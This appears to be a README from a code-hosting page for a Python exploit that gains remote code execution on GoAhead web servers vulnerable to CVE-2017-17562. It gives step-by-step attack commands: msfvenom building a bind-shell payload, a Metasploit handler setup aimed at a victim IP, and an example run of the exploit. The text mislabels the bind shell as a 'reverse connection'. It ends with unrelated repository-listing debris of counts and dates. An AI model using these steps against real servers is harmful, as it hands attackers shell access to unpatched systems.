GoAhead RCE Exploit
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.
Usage
$ python3 cve-2017-17562-exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]
Requirements
$ python3 -m pip install -r requirements.txt
Attention!
You need to generate the payload and set up the listening connection first.
Example:
(Attacker: 192.168.1.100 - Victim: 192.168.1.200)
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337
Then, in another shell, you must run this exploit to send the payload that will start the reverse connection to the listener!
Arguments
Required arguments:
--host HOST Host running the GoAhead webserver.
--port PORT Port running the GoAhead webserver. Default: 80
--payload PAYLOAD Path to the payload.
Optional arguments:
--ssl Host is using SSL.
--cgi LIST Paths list to discover the CGI script on the GoAhead server. Default: paths.lst
Example
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
2 Mar 23, 2022
2 Nov 10, 2022
15 Jul 30, 2022
258 Jan 02, 2023
291 Dec 28, 2022
96 Dec 14, 2022
809 Dec 26, 2022
81 Dec 12, 2022
45 Dec 28, 2022
2 Oct 25, 2022
20 Aug 25, 2022
1 Jun 21, 2022
![Trewis [work] Scotch](https://avatars.githubusercontent.com/u/92666826?v=4&s=60)
4 Sep 23, 2022
795 Dec 29, 2022
11 Nov 17, 2022
1 Nov 28, 2021
0 Jan 10, 2022
12 Nov 22, 2022
2 Jan 01, 2022